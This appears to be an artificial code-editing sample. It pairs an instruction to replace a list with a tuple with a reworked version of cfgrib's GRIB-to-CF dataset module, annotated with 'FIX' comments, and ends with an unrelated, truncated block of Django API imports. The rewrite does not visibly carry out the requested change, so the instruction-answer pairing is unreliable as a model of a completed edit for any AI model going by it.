    filestream = messages.FileStream(path, message_class=cfmessage.CfMessage, errors=grib_errors)
    file_index = filestream.index(sorted(all_keys), indexpath=indexpath)
    return file_index.subindex(filter_by_keys)
def open_file(
    path: T.Union[str, "os.PathLike[str]"],
    grib_errors: str = "warn",
    indexpath: str = "{path}.{short_hash}.idx",
    filter_by_keys: T.Dict[str, T.Any] = {},
    read_keys: T.Sequence[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
    **kwargs: T.Any,
) -> Dataset:
    """Open a GRIB file as a ``cfgrib.Dataset``."""
    # index everything we may need to filter on or to build dimensions from
    index_keys = INDEX_KEYS + list(filter_by_keys) + list(time_dims) + list(extra_coords.keys())
    index = open_fileindex(path, grib_errors, indexpath, index_keys, filter_by_keys=filter_by_keys)
    components = build_dataset_components(
        index, read_keys=read_keys, time_dims=time_dims, extra_coords=extra_coords, **kwargs
    )
    return Dataset(*components)
Simplify the code by replacing a list with a tuple.
#
# Copyright 2017-2021 European Centre for Medium-Range Weather Forecasts (ECMWF).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Alessandro Amici - B-Open - https://bopen.eu
# Aureliana Barghini - B-Open - https://bopen.eu
#
import datetime
import json
import logging
import os
import typing as T
import attr
import numpy as np # type: ignore
from . import __version__, cfmessage, messages
LOG = logging.getLogger(__name__)
#
# Edition-independent keys in ecCodes namespaces. Documented in:
# https://software.ecmwf.int/wiki/display/ECC/GRIB%3A+Namespaces
#
# Attributes read once per dataset; enforce_unique_attributes() requires a
# single value for each of these across all indexed messages.
GLOBAL_ATTRIBUTES_KEYS = ["edition", "centre", "centreDescription", "subCentre"]
# Attributes read once per data variable; must be unique within one paramId.
DATA_ATTRIBUTES_KEYS = [
    "paramId",
    "dataType",
    "numberOfPoints",
    "typeOfLevel",
    "stepUnits",
    "stepType",
    "gridType",
]
# Optional per-variable attributes: read best-effort, missing keys are skipped.
EXTRA_DATA_ATTRIBUTES_KEYS = [
    "shortName",
    "units",
    "name",
    "cfName",
    "cfVarName",
    "missingValue",
    "totalNumber",
    "numberOfDirections",
    "numberOfFrequencies",
    "NV",
    "gridDefinitionDescription",
]
# Geometry keys per gridType: read as extra variable attributes for messages
# of that grid type (see the extra_keys handling in build_variable_components).
GRID_TYPE_MAP = {
    "regular_ll": [
        "Nx",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "Ny",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
    ],
    "rotated_ll": [
        "Nx",
        "Ny",
        "angleOfRotationInDegrees",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
    ],
    "reduced_ll": [
        "Ny",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
    ],
    "regular_gg": [
        "Nx",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "N",
        "Ny",
    ],
    "rotated_gg": [
        "Nx",
        "Ny",
        "angleOfRotationInDegrees",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
        "N",
    ],
    "lambert": [
        "LaDInDegrees",
        "LoVInDegrees",
        "iScansNegatively",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
        "DyInMetres",
        "DxInMetres",
        "Latin2InDegrees",
        "Latin1InDegrees",
        "Ny",
        "Nx",
    ],
    "reduced_gg": ["N", "pl"],
    "sh": ["M", "K", "J"],
}
# Union of all geometry keys across every grid type, de-duplicated and sorted.
GRID_TYPE_KEYS = sorted(set(k for _, ks in GRID_TYPE_MAP.items() for k in ks))
ENSEMBLE_KEYS = ["number"]
# the ":float" suffix is stripped when naming the coordinate; presumably it
# selects the ecCodes key type -- TODO confirm against messages.FileIndex
VERTICAL_KEYS = ["level:float"]
DATA_TIME_KEYS = ["dataDate", "dataTime", "endStep"]
# keys accepted as CF reference-time dimensions (validated in encode_cf_first)
ALL_REF_TIME_KEYS = [
    "time",
    "step",
    "valid_time",
    "verifying_time",
    "forecastMonth",
    "indexing_time",
]
SPECTRA_KEYS = ["directionNumber", "frequencyNumber"]
ALL_HEADER_DIMS = ENSEMBLE_KEYS + VERTICAL_KEYS + SPECTRA_KEYS
# default set of keys used to index a GRIB file
INDEX_KEYS = sorted(
    GLOBAL_ATTRIBUTES_KEYS + DATA_ATTRIBUTES_KEYS + DATA_TIME_KEYS + ALL_HEADER_DIMS
)
# CF attributes attached to well-known coordinate variables, keyed by the
# coordinate name (for vertical coordinates, the GRIB typeOfLevel value).
COORD_ATTRS = {
    # geography
    "latitude": {"units": "degrees_north", "standard_name": "latitude", "long_name": "latitude"},
    "longitude": {"units": "degrees_east", "standard_name": "longitude", "long_name": "longitude"},
    # vertical
    "depthBelowLand": {
        "units": "m",
        "positive": "down",
        "long_name": "soil depth",
        "standard_name": "depth",
    },
    "depthBelowLandLayer": {
        "units": "m",
        "positive": "down",
        "long_name": "soil depth",
        "standard_name": "depth",
    },
    "hybrid": {
        "units": "1",
        "positive": "down",
        "long_name": "hybrid level",
        "standard_name": "atmosphere_hybrid_sigma_pressure_coordinate",
    },
    "heightAboveGround": {
        "units": "m",
        "positive": "up",
        "long_name": "height above the surface",
        "standard_name": "height",
    },
    # "stored_direction": "decreasing" makes build_variable_components sort
    # the coordinate values in reverse
    "isobaricInhPa": {
        "units": "hPa",
        "positive": "down",
        "stored_direction": "decreasing",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    "isobaricInPa": {
        "units": "Pa",
        "positive": "down",
        "stored_direction": "decreasing",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    "isobaricLayer": {
        "units": "Pa",
        "positive": "down",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    # ensemble
    "number": {
        "units": "1",
        "standard_name": "realization",
        "long_name": "ensemble member numerical id",
    },
    # time
    "step": {
        "units": "hours",
        "standard_name": "forecast_period",
        "long_name": "time since forecast_reference_time",
    },
    "time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "forecast_reference_time",
        "long_name": "initial time of forecast",
    },
    "indexing_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "forecast_reference_time",
        "long_name": "nominal initial time of forecast",
    },
    "valid_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "time",
        "long_name": "time",
    },
    "verifying_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "time",
        "long_name": "time",
    },
    "forecastMonth": {"units": "1", "long_name": "months since forecast_reference_time"},
}
class DatasetBuildError(ValueError):
    """Raised when a GRIB index cannot be mapped to a single hypercube."""

    def __str__(self) -> str:
        # Only the human-readable message (first argument) is rendered; any
        # extra args carry the offending key and the candidate filters.
        message = self.args[0]
        return str(message)
def enforce_unique_attributes(index, attributes_keys, filter_by_keys=None):
    # type: (T.Mapping[str, T.Any], T.Sequence[str], T.Optional[T.Dict[str, T.Any]]) -> T.Dict[str, T.Any]
    """Collect ``GRIB_``-prefixed attributes from *index* for *attributes_keys*.

    Keys with the placeholder values ``"undef"``/``"unknown"`` are skipped.
    Raises DatasetBuildError when a key has more than one value, carrying one
    candidate ``filter_by_keys`` per conflicting value so the caller can
    suggest how to re-open the file unambiguously.
    """
    # ``None`` sentinel instead of a mutable ``{}`` default (shared-state pitfall)
    if filter_by_keys is None:
        filter_by_keys = {}
    attributes = {}  # type: T.Dict[str, T.Any]
    for key in attributes_keys:
        values = index[key]
        if len(values) > 1:
            fbks = []
            for value in values:
                fbk = {key: value}
                fbk.update(filter_by_keys)
                fbks.append(fbk)
            raise DatasetBuildError("multiple values for key %r" % key, key, fbks)
        if values and values[0] not in ("undef", "unknown"):
            attributes["GRIB_" + key] = values[0]
    return attributes
@attr.attrs(auto_attribs=True, eq=False)
class Variable(object):
    """A netCDF-like variable: dimension names, a data array and attributes."""

    dimensions: T.Tuple[str, ...]
    data: np.ndarray
    # BUG FIX: ``default={}`` makes every instance share one dict, so mutating
    # one variable's attributes (e.g. adding "stored_direction") silently leaks
    # into all others; ``factory=dict`` builds a fresh dict per instance.
    attributes: T.Dict[str, T.Any] = attr.attrib(factory=dict, repr=False)

    def __eq__(self, other):
        # type: (T.Any) -> bool
        if other.__class__ is not self.__class__:
            return NotImplemented
        equal = (self.dimensions, self.attributes) == (other.dimensions, other.attributes)
        return equal and np.array_equal(self.data, other.data)
def expand_item(item, shape):
    # type: (T.Tuple[T.Any, ...], T.Sequence[int]) -> T.Tuple[T.List[int], ...]
    """Normalize every header index in *item* to an explicit list of ints."""

    def as_index_list(index, size):
        # lists/arrays of indices are coerced to int lists, slices are
        # enumerated against *size*, a scalar becomes a one-element list
        if isinstance(index, (list, np.ndarray)):
            return [int(e) for e in index]
        if isinstance(index, slice):
            return list(range(index.start or 0, index.stop or size, index.step or 1))
        if isinstance(index, int):
            return [index]
        raise TypeError("Unsupported index type %r" % type(index))

    return tuple(as_index_list(i, size) for i, size in zip(item, shape))
@attr.attrs(auto_attribs=True)
class OnDiskArray(object):
    # Lazy, read-only array view over the fields of a GRIB file: every access
    # re-opens the file and decodes only the messages that fall in the selection.
    stream: messages.FileStream
    shape: T.Tuple[int, ...]
    # header indexes (one int per header dimension) -> message offset(s);
    # only offset[0] is used to seek the message
    offsets: T.Dict[T.Tuple[T.Any, ...], T.List[T.Union[int, T.Tuple[int, int]]]] = attr.attrib(
        repr=False
    )
    # sentinel value in the GRIB payload decoded to NaN
    missing_value: float
    # number of trailing geography dimensions (e.g. 1 for 'values', 2 for y/x)
    geo_ndim: int = attr.attrib(default=1, repr=False)
    dtype = np.dtype("float32")
    def build_array(self) -> np.ndarray:
        """Helper method used to test __getitem__"""
        array = np.full(self.shape, fill_value=np.nan, dtype="float32")
        with open(self.stream.path, "rb") as file:
            for header_indexes, offset in self.offsets.items():
                # NOTE: fill a single field as found in the message
                message = self.stream.message_from_file(file, offset=offset[0])
                values = message.message_get("values", float)
                array.__getitem__(header_indexes).flat[:] = values
        array[array == self.missing_value] = np.nan
        return array
    def __getitem__(self, item):
        # type: (T.Tuple[T.Any, ...]) -> np.ndarray
        # Normalize the header part of the index to explicit lists, then build a
        # reverse map: requested header value -> its position in the output.
        header_item_list = expand_item(item[: -self.geo_ndim], self.shape)
        header_item = [{ix: i for i, ix in enumerate(it)} for it in header_item_list]
        array_field_shape = tuple(len(l) for l in header_item_list) + self.shape[-self.geo_ndim :]
        array_field = np.full(array_field_shape, fill_value=np.nan, dtype="float32")
        with open(self.stream.path, "rb") as file:
            for header_indexes, offset in self.offsets.items():
                try:
                    array_field_indexes = [it[ix] for it, ix in zip(header_item, header_indexes)]
                except KeyError:
                    # this message is outside the requested selection
                    continue
                # NOTE: fill a single field as found in the message
                message = self.stream.message_from_file(file, offset=offset[0])
                values = message.message_get("values", float)
                array_field.__getitem__(tuple(array_field_indexes)).flat[:] = values
        # apply the geography part of the index, then decode missing values
        array = array_field[(Ellipsis,) + item[-self.geo_ndim :]]
        array[array == self.missing_value] = np.nan
        for i, it in reversed(list(enumerate(item[: -self.geo_ndim]))):
            if isinstance(it, int):
                # drop axes indexed with a scalar, mimicking numpy indexing
                array = array[(slice(None, None, None),) * i + (0,)]
        return array
# Grid types whose latitudes/longitudes form 1-D dimension coordinates.
GRID_TYPES_DIMENSION_COORDS = {"regular_ll", "regular_gg"}
# Grid types that need full 2-D latitude/longitude auxiliary coordinates.
GRID_TYPES_2D_NON_DIMENSION_COORDS = {
    "rotated_ll",
    "rotated_gg",
    "lambert",
    "lambert_azimuthal_equal_area",
    "albers",
    "polar_stereographic",
}
def build_geography_coordinates(
    first,  # type: messages.Message
    encode_cf,  # type: T.Sequence[str]
    errors,  # type: str
    log=LOG,  # type: logging.Logger
):
    # type: (...) -> T.Tuple[T.Tuple[str, ...], T.Tuple[int, ...], T.Dict[str, Variable]]
    """Build dimension names, shape and coordinate variables for *first*'s grid.

    Depending on ``gridType`` the horizontal coordinates are 1-D dimension
    coordinates (regular grids), 2-D auxiliary coordinates on ``(y, x)``, or
    1-D auxiliary coordinates over a generic ``values`` dimension.

    FIX: every ``COORD_ATTRS[...]`` template is now ``.copy()``-ed before being
    attached to a Variable. Previously only the first latitude branch copied
    (because it mutates the dict right after); the other branches aliased the
    shared module-level template, so any later mutation of a Variable's
    attributes would silently corrupt COORD_ATTRS for the whole process.
    """
    geo_coord_vars = {}  # type: T.Dict[str, Variable]
    grid_type = first["gridType"]
    if "geography" in encode_cf and grid_type in GRID_TYPES_DIMENSION_COORDS:
        geo_dims = ("latitude", "longitude")  # type: T.Tuple[str, ...]
        geo_shape = (first["Ny"], first["Nx"])  # type: T.Tuple[int, ...]
        latitudes = np.array(first["distinctLatitudes"], ndmin=1)
        geo_coord_vars["latitude"] = Variable(
            dimensions=("latitude",), data=latitudes, attributes=COORD_ATTRS["latitude"].copy()
        )
        if latitudes[0] > latitudes[-1]:
            # Latitudes stored north-to-south; record it for consumers.
            geo_coord_vars["latitude"].attributes["stored_direction"] = "decreasing"
        geo_coord_vars["longitude"] = Variable(
            dimensions=("longitude",),
            data=np.array(first["distinctLongitudes"], ndmin=1),
            attributes=COORD_ATTRS["longitude"].copy(),
        )
    elif "geography" in encode_cf and grid_type in GRID_TYPES_2D_NON_DIMENSION_COORDS:
        geo_dims = ("y", "x")
        geo_shape = (first["Ny"], first["Nx"])
        try:
            geo_coord_vars["latitude"] = Variable(
                dimensions=("y", "x"),
                data=np.array(first["latitudes"]).reshape(geo_shape),
                attributes=COORD_ATTRS["latitude"].copy(),
            )
            geo_coord_vars["longitude"] = Variable(
                dimensions=("y", "x"),
                data=np.array(first["longitudes"]).reshape(geo_shape),
                attributes=COORD_ATTRS["longitude"].copy(),
            )
        except KeyError:  # pragma: no cover
            if errors != "ignore":
                log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
    else:
        # Unknown / unstructured grid: a single generic 'values' dimension.
        geo_dims = ("values",)
        geo_shape = (first["numberOfPoints"],)
        # add secondary coordinates if ecCodes provides them
        try:
            latitude = first["latitudes"]
            geo_coord_vars["latitude"] = Variable(
                dimensions=("values",),
                data=np.array(latitude),
                attributes=COORD_ATTRS["latitude"].copy(),
            )
            longitude = first["longitudes"]
            geo_coord_vars["longitude"] = Variable(
                dimensions=("values",),
                data=np.array(longitude),
                attributes=COORD_ATTRS["longitude"].copy(),
            )
        except KeyError:  # pragma: no cover
            if errors != "ignore":
                log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
    return geo_dims, geo_shape, geo_coord_vars
def encode_cf_first(data_var_attrs, encode_cf=("parameter", "time"), time_dims=("time", "step")):
    # type: (T.MutableMapping[str, T.Any], T.Sequence[str], T.Sequence[str]) -> T.List[str]
    """Apply the 'parameter' and 'time' CF encodings to *data_var_attrs*.

    Mutates *data_var_attrs* in place and returns the list of index keys to
    scan for coordinates.
    """
    coords_map = list(ENSEMBLE_KEYS)
    param_id = data_var_attrs.get("GRIB_paramId", "undef")
    data_var_attrs["long_name"] = "original GRIB paramId: %s" % param_id
    data_var_attrs["units"] = "1"
    if "parameter" in encode_cf:
        # Promote the GRIB metadata to CF attribute names when available.
        for cf_name, grib_name in (
            ("standard_name", "GRIB_cfName"),
            ("long_name", "GRIB_name"),
            ("units", "GRIB_units"),
        ):
            if grib_name in data_var_attrs:
                data_var_attrs[cf_name] = data_var_attrs[grib_name]
    if "time" in encode_cf:
        if not set(time_dims).issubset(ALL_REF_TIME_KEYS):
            raise ValueError("time_dims %r not a subset of %r" % (time_dims, ALL_REF_TIME_KEYS))
        coords_map.extend(time_dims)
    else:
        coords_map.extend(DATA_TIME_KEYS)
    coords_map.extend(VERTICAL_KEYS)
    coords_map.extend(SPECTRA_KEYS)
    return coords_map
def read_data_var_attrs(first: messages.Message, extra_keys: T.List[str]) -> T.Dict[str, T.Any]:
    """Read *extra_keys* from *first*, prefixed with ``GRIB_``.

    Keys the message cannot provide are silently skipped (best-effort).
    """
    attributes = {}
    for key in extra_keys:
        try:
            attributes["GRIB_" + key] = first[key]
        except Exception:
            # FIX: was a bare ``except:``, which also swallowed
            # KeyboardInterrupt/SystemExit; keep the best-effort behavior
            # but let those propagate.
            pass
    return attributes
def build_variable_components(
    index: messages.FileIndex,
    encode_cf: T.Sequence[str] = (),
    filter_by_keys: T.Dict[str, T.Any] = {},
    log: logging.Logger = LOG,
    errors: str = "warn",
    squeeze: bool = True,
    read_keys: T.Iterable[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], Variable, T.Dict[str, Variable]]:
    """Build dims, the data Variable and coordinate Variables for one paramId.

    FIX: ``np.asscalar`` (removed in NumPy 1.23) replaced by the documented
    equivalent ``ndarray.item()``; behavior is identical on older NumPy too.
    """
    data_var_attrs = enforce_unique_attributes(index, DATA_ATTRIBUTES_KEYS, filter_by_keys)
    grid_type_keys = GRID_TYPE_MAP.get(index.getone("gridType"), [])
    extra_keys = sorted(list(read_keys) + EXTRA_DATA_ATTRIBUTES_KEYS + grid_type_keys)
    first = index.first()
    extra_attrs = read_data_var_attrs(first, extra_keys)
    data_var_attrs.update(**extra_attrs)
    coords_map = encode_cf_first(data_var_attrs, encode_cf, time_dims)
    coord_name_key_map = {}
    coord_vars = {}
    # Build one coordinate Variable per index key that has defined values.
    for coord_key in coords_map:
        values = index[coord_key]
        if len(values) == 1 and values[0] == "undef":
            log.debug("missing from GRIB stream: %r" % coord_key)
            continue
        orig_name = coord_key.partition(":")[0]
        coord_name = orig_name
        if (
            "vertical" in encode_cf
            and coord_name == "level"
            and "GRIB_typeOfLevel" in data_var_attrs
        ):
            # CF 'vertical' encoding: name the level axis after its type.
            coord_name = data_var_attrs["GRIB_typeOfLevel"]
        coord_name_key_map[coord_name] = coord_key
        attributes = {
            "long_name": "original GRIB coordinate for key: %s(%s)" % (orig_name, coord_name),
            "units": "1",
        }
        attributes.update(COORD_ATTRS.get(coord_name, {}).copy())
        data = np.array(sorted(values, reverse=attributes.get("stored_direction") == "decreasing"))
        dimensions = (coord_name,)  # type: T.Tuple[str, ...]
        if squeeze and len(values) == 1:
            # Single-valued coordinates collapse to scalar variables.
            data = data[0]
            dimensions = ()
        coord_vars[coord_name] = Variable(dimensions=dimensions, data=data, attributes=attributes)
    header_dimensions = tuple(d for d, c in coord_vars.items() if not squeeze or c.data.size > 1)
    header_shape = tuple(coord_vars[d].data.size for d in header_dimensions)
    geo_dims, geo_shape, geo_coord_vars = build_geography_coordinates(first, encode_cf, errors)
    dimensions = header_dimensions + geo_dims
    shape = header_shape + geo_shape
    coord_vars.update(geo_coord_vars)
    offsets = {}  # type: T.Dict[T.Tuple[int, ...], T.List[T.Union[int, T.Tuple[int, int]]]]
    header_value_index = {}
    extra_coords_data: T.Dict[str, T.Dict[str, T.Any]] = {
        coord_name: {} for coord_name in extra_coords
    }
    extra_dims = tuple(extra_coords.values())
    # Map each header coordinate value to its position along its dimension.
    for dim in header_dimensions + extra_dims:
        if np.isscalar(coord_vars[dim].data):
            # FIX: np.asscalar(x) was removed in NumPy 1.23; x.item() is its
            # documented drop-in replacement.
            header_value_index[dim] = {coord_vars[dim].data.item(): 0}
        else:
            header_value_index[dim] = {v: i for i, v in enumerate(coord_vars[dim].data.tolist())}
    # Record, for every message, where its field lands in the output array.
    for header_values, offset in index.offsets:
        header_indexes = []  # type: T.List[int]
        for dim in header_dimensions + extra_dims:
            header_value = header_values[index.index_keys.index(coord_name_key_map.get(dim, dim))]
            if dim in header_dimensions:
                header_indexes.append(header_value_index[dim][header_value])
            for coord_name in extra_coords:
                coord_value = header_values[
                    index.index_keys.index(coord_name_key_map.get(coord_name, coord_name))
                ]
                if dim == extra_coords[coord_name]:
                    # An extra coordinate must be a function of its dimension:
                    # reject two distinct values for the same dimension value.
                    saved_coord_value = extra_coords_data[coord_name].get(
                        header_value, coord_value
                    )
                    if saved_coord_value != coord_value:
                        raise ValueError(
                            f"'{coord_name}' cannot be indexed by dimension '{extra_coords[coord_name]}': \n"
                            f"found two '{coord_name}' distinct values ({saved_coord_value}, {coord_value}) "
                            f"for '{extra_coords[coord_name]}' value {header_value}."
                        )
                    extra_coords_data[coord_name][header_value] = coord_value
        offsets[tuple(header_indexes)] = offset
    missing_value = data_var_attrs.get("missingValue", 9999)
    # Lazy array: fields are read from disk on demand via OnDiskArray.
    data = OnDiskArray(
        stream=index.filestream,
        shape=shape,
        offsets=offsets,
        missing_value=missing_value,
        geo_ndim=len(geo_dims),
    )
    if "time" in coord_vars and "step" in coord_vars:
        # add the 'valid_time' secondary coordinate
        time_dims, time_data = cfmessage.build_valid_time(
            coord_vars["time"].data, coord_vars["step"].data,
        )
        attrs = COORD_ATTRS["valid_time"]
        coord_vars["valid_time"] = Variable(dimensions=time_dims, data=time_data, attributes=attrs)
    for coord_name in extra_coords:
        coord_data = np.array(list(extra_coords_data[coord_name].values()))
        if extra_coords[coord_name] not in header_dimensions:
            # Dimension was squeezed away: store the coordinate as a scalar.
            coord_dimensions: T.Tuple[str, ...] = ()
            coord_data = coord_data.reshape(())
        else:
            coord_dimensions = (extra_coords[coord_name],)
        coord_vars[coord_name] = Variable(dimensions=coord_dimensions, data=coord_data,)
    data_var_attrs["coordinates"] = " ".join(coord_vars.keys())
    data_var = Variable(dimensions=dimensions, data=data, attributes=data_var_attrs)
    dims = {d: s for d, s in zip(dimensions, data_var.data.shape)}
    return dims, data_var, coord_vars
def dict_merge(master, update):
    # type: (T.Dict[str, T.Any], T.Dict[str, T.Any]) -> None
    """Merge *update* into *master* in place.

    Keys absent from *master* are added; keys already present must map to an
    equal value, otherwise a DatasetBuildError is raised. Equal existing
    entries are left untouched.
    """
    for key, value in update.items():
        if key not in master:
            master[key] = value
        elif master[key] != value:
            raise DatasetBuildError(
                "key present and new value is different: "
                "key=%r value=%r new_value=%r" % (key, master[key], value)
            )
def build_dataset_attributes(index, filter_by_keys, encoding):
    # type: (messages.FileIndex, T.Dict[str, T.Any], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
    """Build the global (dataset-level) attributes, including a CF history entry."""
    attributes = enforce_unique_attributes(index, GLOBAL_ATTRIBUTES_KEYS, filter_by_keys)
    attributes["Conventions"] = "CF-1.7"
    if "GRIB_centreDescription" in attributes:
        attributes["institution"] = attributes["GRIB_centreDescription"]
    history_in = (
        "{timestamp} GRIB to CDM+CF via "
        "cfgrib-{cfgrib_version}/ecCodes-{eccodes_version} with {cfgrib_open_kwargs}"
    )
    # Timestamp truncated to minute precision (YYYY-MM-DDTHH:MM).
    attributes["history"] = history_in.format(
        timestamp=datetime.datetime.now().isoformat().partition(".")[0][:16],
        cfgrib_version=__version__,
        eccodes_version=messages.eccodes_version,
        cfgrib_open_kwargs=json.dumps(encoding),
    )
    return attributes
def build_dataset_components(
    index: messages.FileIndex,
    errors: str = "warn",
    encode_cf: T.Sequence[str] = ("parameter", "time", "geography", "vertical"),
    squeeze: bool = True,
    log: logging.Logger = LOG,
    read_keys: T.Iterable[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], T.Dict[str, Variable], T.Dict[str, T.Any], T.Dict[str, T.Any]]:
    """Assemble dimensions, variables, attributes and encoding for the file.

    Builds one data variable per distinct paramId in *index* and merges the
    per-variable dims/coords; merge conflicts are handled per the *errors*
    policy ("warn" logs and skips, "ignore" skips silently, "raise" re-raises).
    """
    dimensions = {}  # type: T.Dict[str, int]
    variables = {}  # type: T.Dict[str, Variable]
    filter_by_keys = index.filter_by_keys
    for param_id in index["paramId"]:
        var_index = index.subindex(paramId=param_id)
        try:
            dims, data_var, coord_vars = build_variable_components(
                var_index,
                encode_cf,
                filter_by_keys,
                errors=errors,
                squeeze=squeeze,
                read_keys=read_keys,
                time_dims=time_dims,
                extra_coords=extra_coords,
            )
        except DatasetBuildError as ex:
            # NOTE: When a variable has more than one value for an attribute we need to raise all
            # the values in the file, not just the ones associated with that variable. See #54.
            key = ex.args[1]
            error_message = "multiple values for unique key, try re-open the file with one of:"
            fbks = []
            for value in index[key]:
                fbk = {key: value}
                fbk.update(filter_by_keys)
                fbks.append(fbk)
                error_message += "\n filter_by_keys=%r" % fbk
            raise DatasetBuildError(error_message, key, fbks)
        # Prefer the CF variable name when 'parameter' encoding is on and the
        # name is defined; otherwise fall back to shortName / paramId.
        short_name = data_var.attributes.get("GRIB_shortName", "paramId_%d" % param_id)
        var_name = data_var.attributes.get("GRIB_cfVarName", "unknown")
        if "parameter" in encode_cf and var_name not in ("undef", "unknown"):
            short_name = var_name
        try:
            dict_merge(variables, coord_vars)
            dict_merge(variables, {short_name: data_var})
            dict_merge(dimensions, dims)
        except ValueError:
            # NOTE(review): dict_merge raises DatasetBuildError; catching
            # ValueError here implies DatasetBuildError subclasses ValueError
            # -- confirm against the exception definition.
            if errors == "ignore":
                pass
            elif errors == "raise":
                raise
            else:
                log.exception("skipping variable: paramId==%r shortName=%r", param_id, short_name)
    # Enough information to re-open the file the same way.
    encoding = {
        "source": index.filestream.path,
        "filter_by_keys": filter_by_keys,
        "encode_cf": encode_cf,
    }
    attributes = build_dataset_attributes(index, filter_by_keys, encoding)
    return dimensions, variables, attributes, encoding
@attr.attrs(auto_attribs=True)
class Dataset(object):
    """
    Map a GRIB file to the NetCDF Common Data Model with CF Conventions.
    """

    # Dimension name -> size.
    dimensions: T.Dict[str, int]
    # Variable name -> Variable (data variables and coordinates).
    variables: T.Dict[str, Variable]
    # Global (dataset-level) attributes.
    attributes: T.Dict[str, T.Any]
    # Keyword arguments needed to re-open the file identically.
    encoding: T.Dict[str, T.Any]
def open_fileindex(
    path: T.Union[str, "os.PathLike[str]"],
    grib_errors: str = "warn",
    indexpath: str = "{path}.{short_hash}.idx",
    index_keys: T.Sequence[str] = INDEX_KEYS + ["time", "step"],
    filter_by_keys: T.Dict[str, T.Any] = {},
) -> messages.FileIndex:
    """Index the GRIB file at *path* and restrict it by *filter_by_keys*."""
    path = os.fspath(path)
    # Filter keys must also be indexed so the subindex can be applied.
    all_keys = sorted(set(index_keys) | set(filter_by_keys))
    stream = messages.FileStream(path, message_class=cfmessage.CfMessage, errors=grib_errors)
    return stream.index(all_keys, indexpath=indexpath).subindex(filter_by_keys)
def open_file(
    path: T.Union[str, "os.PathLike[str]"],
    grib_errors: str = "warn",
    indexpath: str = "{path}.{short_hash}.idx",
    filter_by_keys: T.Dict[str, T.Any] = {},
    read_keys: T.Sequence[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
    **kwargs: T.Any,
) -> Dataset:
    """Open a GRIB file as a ``cfgrib.Dataset``."""
    # Index every key we will later need: filters, time dims and extra coords.
    all_index_keys = INDEX_KEYS + list(filter_by_keys) + list(time_dims) + list(extra_coords.keys())
    file_index = open_fileindex(
        path, grib_errors, indexpath, all_index_keys, filter_by_keys=filter_by_keys
    )
    components = build_dataset_components(
        file_index, read_keys=read_keys, time_dims=time_dims, extra_coords=extra_coords, **kwargs
    )
    return Dataset(*components)
|
from collections import namedtuple
from itertools import chain
from django.conf.urls import url
from django.contrib.auth.models import User
from django.forms import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import ugettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from casexml.apps.stock.models import StockTransaction
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.sms.models import MessagingEvent, MessagingSubEvent, Email, SMS
from phonelog.models import DeviceReportEntry
from corehq import privileges
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
